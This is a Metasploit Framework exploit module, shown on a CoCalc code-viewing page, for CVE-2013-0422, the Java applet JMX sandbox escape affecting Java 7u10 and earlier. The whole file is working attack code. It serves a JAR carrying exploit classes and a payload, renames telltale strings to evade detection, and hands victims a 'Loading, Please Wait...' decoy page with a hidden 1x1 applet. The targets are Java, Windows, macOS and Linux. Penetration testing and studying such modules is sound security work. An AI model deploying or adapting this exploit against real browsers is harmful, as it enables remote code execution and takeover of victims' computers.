Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  include Msf::Exploit::Remote::BrowserAutopwn

13
  autopwn_info({ :javascript => false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet JMX Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the JMX classes from a Java Applet to run arbitrary Java

22
          code outside of the sandbox as exploited in the wild in January of 2013. The

23
          vulnerability affects Java version 7u10 and earlier.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Unknown', # Vulnerability discovery

28
          'egypt', # Metasploit module

29
          'sinn3r', # Metasploit module

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-0422' ],

34
          [ 'OSVDB', '89059' ],

35
          [ 'US-CERT-VU', '625617' ],

36
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],

37
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],

38
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ] # Who authored the code on pastebin?  I can't read Russian :-(

39
        ],

40
        'Platform' => %w{java linux osx win},

41
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

42
        'Targets' => [

43
          [

44
            'Generic (Java Payload)',

45
            {

46
              'Platform' => ['java'],

47
              'Arch' => ARCH_JAVA,

48
            }

49
          ],

50
          [

51
            'Windows x86 (Native Payload)',

52
            {

53
              'Platform' => 'win',

54
              'Arch' => ARCH_X86,

55
            }

56
          ],

57
          [

58
            'Mac OS X x86 (Native Payload)',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_X86,

62
            }

63
          ],

64
          [

65
            'Linux x86 (Native Payload)',

66
            {

67
              'Platform' => 'linux',

68
              'Arch' => ARCH_X86,

69
            }

70
          ],

71
        ],

72
        'DefaultTarget' => 0,

73
        'DisclosureDate' => '2013-01-10',

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81
  end

82


83
  def setup

84
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0422", "Exploit.class")

85
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

86
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0422", "B.class")

87
    @loader_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

88


89
    @exploit_class_name = rand_text_alpha("Exploit".length)

90
    @exploit_class.gsub!("Exploit", @exploit_class_name)

91
    super

92
  end

93


94
  def on_request_uri(cli, request)

95
    print_status("handling request for #{request.uri}")

96


97
    case request.uri

98
    when /\.jar$/i

99
      jar = payload.encoded_jar

100
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

101
      jar.add_file("B.class", @loader_class)

102
      metasploit_str = rand_text_alpha("metasploit".length)

103
      payload_str = rand_text_alpha("payload".length)

104
      jar.entries.each { |entry|

105
        entry.name.gsub!("metasploit", metasploit_str)

106
        entry.name.gsub!("Payload", payload_str)

107
        entry.data = entry.data.gsub("metasploit", metasploit_str)

108
        entry.data = entry.data.gsub("Payload", payload_str)

109
      }

110
      jar.build_manifest

111


112
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })

113
    when /\/$/

114
      payload = regenerate_payload(cli)

115
      if not payload

116
        print_error("Failed to generate the payload.")

117
        send_not_found(cli)

118
        return

119
      end

120
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

121
    else

122
      send_redirect(cli, get_resource() + '/', '')

123
    end

124
  end

125


126
  def generate_html

127
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|

128
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|

129
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|

130
    html += %Q|</applet></body></html>|

131
    return html

132
  end

133
end

134


135